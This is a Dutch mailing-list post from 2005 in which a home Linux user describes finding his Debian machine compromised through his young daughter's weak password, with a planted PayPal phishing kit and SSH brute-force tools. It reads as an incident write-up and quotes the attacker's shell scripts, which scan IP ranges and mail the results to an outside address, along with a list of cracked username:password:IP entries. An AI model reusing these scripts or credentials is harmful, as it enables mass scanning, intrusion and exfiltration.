[linux] Ik ben gekraakt.

Remko Bolt remko op cluebox.org
Ma Jun 27 02:12:21 CEST 2005 

Tsja,

De eerste keer dat ik iets bemerkte was toen de computer opeens tergend
langzaam werd. Wel raar voor een dual P-III 1GHz met 640 MB geheugen.
Top leerde dat dit werd veroorzaakt door een proces 'a' dat gedraaid
werd door user anna (mijn dochter van 6) terwijl zij niet eens ingelogd
was. Hmmm... :-| raar. Hoe had zij dit voor elkaar gekregen? Aangezien
zelfs een reboot het euvel niet kon verhelpen heb ik haar account
gelocked met usermod -L om het later eens uit te zoeken. Toen zij een
tijdje later vroeg waarom zij niet meer kon computeren heb ik haar weer
toegang gegeven. Maar was het euvel eigenlijk wel verholpen...?

Toen bemerkte ik dat de ADSL verbinding begon te haperen. Ik kon er geen
vinger op leggen, maar het leek of er iets met de DNS aan de hand was.
Een paar dagen later kon ik ineens helemaal geen verbinding meer
krijgen. Een telefoontje met de helpdesk leerde mij dat "de afdeling
abuse" de verbinding had geblokkeerd. Zij zouden contact met mij
opnemen. Na veel gepeuter toch iets los gekregen over een klacht van
Paypal ivm een illegale website.

Bij mij? Hoe kan dat nou... Nee toch!

login: root
#zgrep paypal /var/log/apache2/*
...
error.log.1:[Fri Jun 17 08:21:14 2005] [error] [client 195.241.45.125]
File does not exist: /var/www/en_US, referer:
http://212.182.161.189/~anna/.paypal/
...
#cd /home/anna/public_html, ls
index.html
#ls -al
drwxr-xr-x   3 root root 4096 Jun 26 23:31 .
drwxr-xr-x  28 1001 1001 4096 Jun 23 10:23 ..
drwxr-xr-x   2 1001 1001 4096 Jun 23 10:17 .paypal
-rw-r--r--   1 root root    0 Jun 26 23:31 index.html
"Oh ooh, de website..."
#cd .p*
ls
addr.gif         email.php    index.php   pdown.gif      security.jpg
adress.png       formular.php linie.jpg   pdownclick.gif sline.gif
ccval.php        go1.gif      login.html  pin.html       spacer.gif
confirmation.htm go1click.gif login.php   pp.jpg         sys.php
ebscr.php        go1roll.gif  ls          ress.gif       verify.jpg
email.html       ie2.gif      mail.pp.htm secure.jpg     webscr.php
#find / -user anna *
...
/tmp/
/tmp/ /.a
/tmp/ /.a/q
/tmp/ /.a/a
/tmp/ /.a/z
/tmp/ /.a/ainfo
/tmp/ /.a/http_get.c
/tmp/ /.a/http_get.h
/tmp/ /.a/cgifile
/tmp/ /.a/sscaw
/tmp/ /.a/ssort
...
"Hee, daar hebben we proces a!"
#cat /tmp/\ /.a/a
 #!/bin/bash
 if [ $# != 1 ]; then
         echo " usage: $0 <b class> "
         exit;
 fi

 echo "  Doi in Unu .. Multumiri Mie"
 echo "----------------------------------------------------"
 echo "    ----- Modificat Si Stricat de mine ;) -----     "
 echo "----------------------------------------------------"
 echo " Pff si Incepem ...... "
 ./sscaw $1 80
 cat $1.pscan.80 | sort | uniq > uniq.txt
 ./ssort uniq.txt  partial.txt  100 cgifile
 rm -rf $1.pscan.80  uniq.txt
 killall -9 sscaw ssort rm cat q
#cat /tmp/\ /.a/ainfo
 #!/bin/bash
 ...
 ./a 64.0; ./a 64.1; ./a 64.2; ./a 64.3; ./a 64.4; ./a 64.5; ./a 64.6;
./a 64.7;
 ./a 64.8; ./a 64.9; ./a 64.10; ./a 64.11; ./a 64.12; ./a 64.13; ./a
64.14; ./a 6;
 ...
 cat vuln.txt | sort | uniq | mail -s " `uname -n` results"
bunazana op yahoo.com
"Daar hebben we de boosdoener, meneer bunazana."
(find continued)
...
/home/anna/stix
/home/anna/stix/ssh-scan
/home/anna/stix/pscan2
/home/anna/stix/ss
/home/anna/stix/gen-pass.sh
/home/anna/stix/pass_file
/home/anna/stix/go.sh
/home/anna/stix/common
/home/anna/stix/costi
/home/anna/stix/core
/home/anna/stix/old-vuln.txt
...
#cat /home/anna/stix/old-vuln.txt
...
test:test:195.137.45.248
postmaster:postmaster:212.88.134.83
info:info:212.90.39.97
admin:password:212.93.201.163
party:party:212.93.27.118
admin:123456:203.64.164.201
...
"The names have been changed to protect the innocent..."
(find continued)
...
/proc/30952
/proc/30952/fd
/proc/30952/fd/0
/proc/30952/fd/1
/proc/30952/fd/2
/proc/30952/fd/3
/proc/30952/fd/4
/proc/30952/fd/5
/proc/30952/environ
/proc/30952/status
/proc/30952/cmdline
/proc/30952/stat
/proc/30952/statm
/proc/30952/cpu
/proc/30952/maps
/proc/30952/mem
/proc/30952/cwd
/proc/30952/root
/proc/30952/exe
/proc/30952/mounts
...
"Waarom is anna owner van deze dir, foutje van de kraker?"
# cat environ
TERM=xtermSHELL=/bin/bashSSH_CLIENT=82.76.25.60 2209
22SSH_TTY=/dev/pts/1USER=annaMAIL=/var/mail/anna
PATH=/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games
PWD=/home/anna/mechSHLVL=1HOME=/home/annaLOGNAME=anna
SSH_CONNECTION=82.76.25.60 2209 10.0.0.1 22_=./crond
OLDPWD=/home/ann
"Ah we hebben een ip-tje van de kraker (of van het gebruikte relay)."

Hoe heeft het zo ver kunnen komen?

Het begon eigenlijk toen mijn dochter leerde schrijven. Zij wilde net
als papa achter de computer typen. Papa zo trots als een aap gaf zijn
lieve kleine meisje haar eigen login op de grote Debian computer.
Aangezien ze net haar naam had leren spellen werd dat tevens haar
password. Dat was fout nummer 1. Tevens kreeg Anna haar eigen website
met foto's van de verjaardagen enz. Fout nummer 2. Papa wilde graag ssh
toegang van buiten af en opende poort nummer 22 van de firewall zonder
papa de exclusieve ssh rechten te geven. Fout nummer 3, drie maal is
scheepsrecht.

Hoe nu verder?

Schoonmaken heeft waarschijnlijk geen zin. Opnieuw installeren dan maar.
Tiscali abuse nog aan de lijn gehad. Servers draaien mag niet meer, dus
ook van provider switchen. Mezelf voor mijn kop slaan, wonden likken en
doorgaan.

Eigenlijk toch een spannende ervaring rijker.
Hoop dat het voor velen leerzaam was, voor mij zeker!
Als er mensen zijn die meer details willen weten hoor ik het wel.

Groeten,
Remko Bolt

PS: Voor zover ik weet wordt /tmp bij elke reboot geleegd. is de " "
onzichtbaar voor deze schoonmaak?

More information about the Linux mailing list